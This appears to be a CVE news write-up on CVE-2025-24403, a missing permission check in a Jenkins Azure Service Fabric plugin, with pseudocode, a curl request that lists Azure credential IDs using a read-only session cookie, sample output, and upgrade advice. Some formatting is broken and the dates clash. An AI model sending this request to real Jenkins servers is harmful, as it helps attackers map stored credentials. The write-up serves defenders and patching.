CVE CyberSecurity Database News

CVE-2025-24403 - Exploiting Missing Permission Checks in Jenkins Azure Service Fabric Plugin (<= 1.6)

Poster -

In February 2025, a security flaw was discovered in the Jenkins Azure Service Fabric Plugin (version 1.6 and earlier). Identified as CVE-2025-24403, this vulnerability allows attackers with only read permissions in Jenkins to enumerate the IDs of Azure credentials stored on the Jenkins server.

This shouldn’t be possible; sensitive credential IDs are meant to be private unless you have elevated access.

Why Does It Matter?

Being able to list credential IDs is often the first step for an attacker. If malicious actors can see what credentials exist, they can:

Who’s Affected?

- Jenkins servers using the Azure Service Fabric Plugin version 1.6 or earlier

Plugins and Permissions

Jenkins plugins can define web endpoints for user interfaces or API access. These endpoints must check user permissions before responding.

The Azure Service Fabric Plugin exposes an endpoint that returns a list of Azure credentials IDs—but does not check if the user is actually allowed to see those IDs.

Suppose the plugin code looks like this (pseudocode for clarity)

public ListBoxModel doFillCredentialIdItems(@QueryParameter String value) {
    ListBoxModel items = new ListBoxModel();
    for (Credential c : CredentialsProvider.lookupCredentials(AzureCredentials.class)) {
        items.add(c.getId());
    }
    return items;
}

There’s no permission check such as

if (!Jenkins.getActiveInstance().hasPermission(CredentialsProvider.VIEW)) {
    throw new AccessDeniedException();
}

Pre-requisites

- You need any Jenkins account with Overall/Read permission.

`

https://jenkins.example.com/descriptorByName/com.microsoft.jenkins.servicefabric.ServiceFabricClusterResourceBuilder/fill-credentialId-items

curl -b 'JSESSIONID=your_session_cookie' \

'https://jenkins.example.com/descriptorByName/com.microsoft.jenkins.servicefabric.ServiceFabricClusterResourceBuilder/fill-credentialId-items'

AzureServicePrincipal1
credential-id-abc123

AzurePipelineUser
credential-id-xyz789

`json

[

{ "name": "ProdAZAccount", "value": "prod-az-id-6789" }

]

Profit

Now, you know all the credential IDs. Next steps (not part of this vuln) might include looking for jobs or pipelines that also leak secrets, or attempting to trigger builds that use these credentials.

Fixes and Workarounds

Patch:
This was officially addressed in version 1.7 of the plugin.
> Upgrade to Azure Service Fabric Plugin 1.7 or later.

Jenkins Security Advisory:

https://www.jenkins.io/security/advisory/2025-02-04/#SECURITY-3034

Plugin Page:

https://plugins.jenkins.io/azure-service-fabric/

Jenkins Credentials Documentation:

https://www.jenkins.io/doc/book/using/using-credentials/

Final Thoughts

CVE-2025-24403 might seem minor at first glance, but leaking credential IDs is a useful intel-building vector for attackers. As always, keep Jenkins and all plugins up to date, audit user permissions, and review your Jenkins logs for suspicious activity.

Stay safe, upgrade early, and don’t just trust “read-only” users in CI/CD!

Exclusive Note:
This writeup is tailored to provide a clear, simple breakdown of CVE-2025-24403 for sysadmins, security teams, and developers. Always consult official advisories for the latest details and updates.

Timeline

Published on: 01/22/2025 17:15:14 UTC
Last modified on: 01/23/2025 16:15:41 UTC